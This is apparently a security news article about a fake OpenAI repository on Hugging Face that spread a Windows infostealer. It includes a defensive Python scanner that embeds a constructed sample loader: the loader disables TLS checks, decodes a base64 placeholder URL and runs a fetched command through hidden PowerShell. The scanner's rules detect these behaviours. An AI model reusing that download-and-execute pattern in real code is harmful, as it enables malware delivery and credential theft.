Fake OpenAI repository on Hugging Face pushes infostealer malware

A malicious Hugging Face repository that made it onto the platform's trending list impersonated the OpenAI "Privacy Filter" project to deliver an infostealer that targets Windows users.
The repository briefly reached #1 on Hugging Face's trending list and accumulated 244,000 downloads before the platform responded to reports and removed it.
The Hugging Face platform allows developers and researchers to share AI models, datasets, and machine learning (ML) tools. A model on the platform is a pre-trained AI program distributed as a repository that bundles weight files, configuration, and code.
Researchers from HiddenLayer, a company that specializes in protecting AI and ML models from attacks, discovered the campaign on May 7, after spotting a malicious repository named Open-OSS/privacy-filter.
"The repository mimicked the official OpenAI Privacy Filter release, copied its model card almost verbatim, and shipped a loader.py file that downloads and executes the infostealer malware on Windows machines," the researchers explain.

Source: HiddenLayer
The 'loader.py' Python script included decoy AI-related code to appear harmless, but behind the scenes it disabled SSL certificate verification, decoded a base64-encoded URL pointing to an external resource, downloaded a JSON payload containing a PowerShell command from it, and executed that command.
The command, run in a hidden window, downloads a batch file (start.bat) that performs privilege escalation, downloads the final payload (sefirah), adds Microsoft Defender exclusions for it, and executes it.
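The loader behaviours described above (TLS verification disabled, a base64-encoded URL decoded at runtime, a hidden PowerShell process spawned) are cheap to triage statically before any code from a model repository is executed. The scanner below is an added example, not HiddenLayer's tooling and not the actual loader.py; it parses a Python file with the standard `ast` module and reports those indicators. The sample loader it runs against is constructed here to mimic the article's description, and the URL it hides (example.invalid) is a placeholder, not the real infrastructure.

```python
"""Static triage of a Python file pulled from a model repository.

Added example (not the page's or HiddenLayer's code).  Flags the three
behaviours the article attributes to loader.py:
  1. TLS certificate verification disabled
  2. a base64-encoded string literal that decodes to a URL
  3. a process spawn that launches PowerShell, especially hidden
plus any plain remote fetch, so an analyst sees the full download chain.
"""
import ast
import base64
import re

URL_RE = re.compile(r"^https?://\S+$")
SPAWN_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
               "subprocess.check_output", "os.system", "os.popen"}
NETWORK_CALLS = {"urllib.request.urlopen", "requests.get", "requests.post"}

# Constructed sample that imitates the described loader; the decoy
# load_model() is the "AI-related code" that makes the file look benign.
_TEMPLATE = '''
import ssl, base64, json, subprocess, urllib.request

def load_model(path):
    # decoy: looks like model-loading code, does nothing useful
    return dict(weights=path)

ssl._create_default_https_context = ssl._create_unverified_context
u = base64.b64decode("__B64__").decode()
cfg = json.loads(urllib.request.urlopen(u).read())
subprocess.Popen(["powershell", "-WindowStyle", "Hidden", "-Command", cfg["cmd"]])
'''
# Placeholder URL (assumption, not the campaign's real C2 or staging host).
_ENCODED_URL = base64.b64encode(b"https://example.invalid/payload.json").decode()
SAMPLE_LOADER = _TEMPLATE.replace("__B64__", _ENCODED_URL)


def _dotted(node):
    """Return 'pkg.mod.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _string_literals(node):
    """Yield every string constant nested anywhere under node."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Constant) and isinstance(sub.value, str):
            yield sub.value


def _try_b64(text):
    """Decode strict base64 to ASCII, or return None if it is not that."""
    try:
        return base64.b64decode(text, validate=True).decode("ascii")
    except ValueError:          # covers binascii.Error and UnicodeDecodeError
        return None


def triage(source):
    """Return sorted, de-duplicated (line, finding) pairs for one file."""
    findings = set()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Assign):
            for target in node.targets:
                if _dotted(target) == "ssl._create_default_https_context":
                    findings.add((node.lineno, "ssl: default HTTPS context overridden"))
        if isinstance(node, ast.Attribute) and node.attr == "_create_unverified_context":
            findings.add((node.lineno, "ssl: unverified TLS context"))
        if not isinstance(node, ast.Call):
            continue
        name = _dotted(node.func)
        for kw in node.keywords:
            if kw.arg == "verify" and isinstance(kw.value, ast.Constant) and kw.value.value is False:
                findings.add((node.lineno, f"{name or 'call'}: TLS verification disabled (verify=False)"))
        if name in ("base64.b64decode", "b64decode"):
            for lit in _string_literals(node):
                decoded = _try_b64(lit)
                if decoded and URL_RE.match(decoded):
                    findings.add((node.lineno, f"base64-obfuscated URL: {decoded}"))
        if name in NETWORK_CALLS:
            findings.add((node.lineno, f"{name}: remote fetch"))
        if name in SPAWN_CALLS:
            lits = [s.lower() for s in _string_literals(node)]
            if any("powershell" in s for s in lits):
                hidden = " with a hidden window" if "hidden" in lits else ""
                findings.add((node.lineno, f"{name} spawns PowerShell{hidden}"))
            else:
                findings.add((node.lineno, f"{name} spawns a process"))
    return sorted(findings)


def is_suspicious(source):
    """True if triage() reports anything; a quick gate for a repo checker."""
    return bool(triage(source))


if __name__ == "__main__":
    for line, msg in triage(SAMPLE_LOADER):
        print(f"line {line}: {msg}")
```

Run it over every `.py` file in a freshly cloned model repository before any `trust_remote_code` style load; a hit on the base64-URL or hidden-PowerShell rule is reason enough to stop and inspect by hand, since legitimate model code has no need for either.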
The payload is a Rust-based infostealer that targets the following sensitive data:
- Browser data from Chromium- and Gecko-based browsers (e.g., cookies, saved passwords, encryption keys, browsing history, tokens)
- Discord tokens, local database, and master keys
- Cryptocurrency wallets and wallet browser extensions
- SSH, FTP, and VPN credentials and configuration files, including FileZilla
- Files from sensitive locations, and wallet tokens/keys
- System information
- Screenshots of multiple monitors
The stolen data is compressed and exfiltrated to a command-and-control (C2) server at recargapopular[.]com.
HiddenLayer highlights a number of anti-analysis features, including checks for virtual machines, sandboxes, debuggers, and analysis tools, all aimed at evading automated analysis systems.
The exact number of victims in this incident is unclear, and the researchers noted that most of the 667 accounts that liked the malicious repository on Hugging Face appeared to be automatically generated. The download count of 244,000 may likewise have been artificially inflated.
By pivoting on those accounts, the researchers found other repositories that used the same malicious upload infrastructure. HiddenLayer also observed overlap with an npm typosquatting campaign distributing Winos 4.0.
Users who downloaded files from the malicious repository are advised to re-scan the machine, change all stored credentials, move cryptocurrency funds to new wallets with fresh seed phrases, and invalidate browser sessions and tokens.
Threat actors have abused Hugging Face in the past to host malicious models, evading the platform's security scanning.
